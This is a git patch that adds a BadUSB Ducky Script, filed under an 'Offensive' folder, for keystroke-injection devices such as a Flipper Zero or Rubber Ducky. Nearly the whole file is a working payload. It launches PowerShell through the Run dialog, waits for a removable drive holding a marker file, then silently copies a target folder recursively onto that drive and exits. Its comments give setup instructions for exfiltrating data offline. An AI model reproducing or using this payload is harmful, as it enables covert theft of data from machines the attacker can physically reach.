From 87ab7000d0437ad34cb6b93c2f7ab146d24d8653 Mon Sep 17 00:00:00 2001
From: Zarcolio <registered@quicknet.nl>
Date: Tue, 4 Jul 2023 21:58:27 +0200
Subject: [PATCH] Add files via upload

---
 .../Ducky Scripts/Offensive/ExfillToUsb.txt   | 68 +++++++++++++++++++
 1 file changed, 68 insertions(+)
 create mode 100644 BadUSB/Ducky Scripts/Offensive/ExfillToUsb.txt

diff --git a/BadUSB/Ducky Scripts/Offensive/ExfillToUsb.txt b/BadUSB/Ducky Scripts/Offensive/ExfillToUsb.txt
new file mode 100644
index 0000000..00fe2ae
--- /dev/null
+++ b/BadUSB/Ducky Scripts/Offensive/ExfillToUsb.txt	
@@ -0,0 +1,68 @@
+REM                                                                    _..._       .-'''-.                 .-'''-.
+REM                                                                 .-'_..._''.   '   _    \  .---.       '   _    \
+REM /|                                                            .' .'      '.\/   /` '.   \ |   |.--. /   /` '.   \
+REM ||    .-.          .-                                        / .'          .   |     \  ' |   ||__|.   |     \  '
+REM ||     \ \        / /                               .-,.--. . '            |   '      |  '|   |.--.|   '      |  '
+REM ||  __  \ \      / /                          __    |  .-. || |            \    \     / / |   ||  |\    \     / /
+REM ||/'__ '.\ \    / /            .--------.  .:--.'.  | |  | || |             `.   ` ..' /  |   ||  | `.   ` ..' /
+REM |:/`  '. '\ \  / /             |____    | / |   \ | | |  | |. '                '-...-'`   |   ||  |    '-...-'`
+REM ||     | | \ `  /                  /   /  `" __ | | | |  '-  \ '.          .              |   ||  |
+REM ||\    / '  \  /                 .'   /    .'.''| | | |       '. `._____.-'/              |   ||__|
+REM |/\'..' /   / /                 /    /___ / /   | |_| |         `-.______ /               '---'
+REM '  `'-'`|`-' /                 |         |\ \._,\ '/|_|                  `
+REM          '..'                  |_________| `--'  `"
+
+REM Do you want BadUSB / Ducky Script to exfill data from a machine but not online?
+REM This script tests all removable drive root directories for a certain file with a random file name.
+REM IF this file is detected, this means this drive is the removable you're using to exfill data to.
+REM How to use this script?
+REM Copy this Ducky script to your Flipper Zero or Rubber Ducky, generate a file with a random file name
+REM and change the value of $CopyFrom, $CopyTo and $FindMe below accordingly.
+
+DELAY 1000
+GUI r
+DELAY 1000
+STRING powershell
+ENTER
+DELAY 2000
+ENTER
+ALTCODE $CopyFrom = "C:\Windows"
+ENTER
+ALTCODE $CopyTo = "copy"
+ENTER
+ALTCODE $FindMe = "gfhnubkw.txt"
+ENTER
+ENTER
+STRING $f = $false
+ENTER
+STRING Cls
+ENTER
+STRING while (-not $f) {
+ENTER
+STRING $d = Get-WmiObject -Class Win32_Volume | Where-Object { $_.DriveType -eq 2 }
+ENTER
+STRING foreach ($e in $d) {
+ENTER
+STRING $p = Join-Path -Path $e.Name -ChildPath $FindMe
+ENTER
+STRING if (Test-Path $p) {
+ENTER
+STRING $f = $true
+ENTER
+ALTCODE Write-Host "Copying..."
+ENTER
+ALTCODE $Destination = "$($e.Name)\$CopyTo"
+ENTER
+STRING Copy-Item -Path $CopyFrom -Destination $Destination -Recurse -ErrorAction SilentlyContinue ; Exit
+ENTER
+STRING }
+ENTER
+STRING break
+ENTER
+STRING }
+ENTER
+STRING }
+ENTER
+STRING Exit
+ENTER
+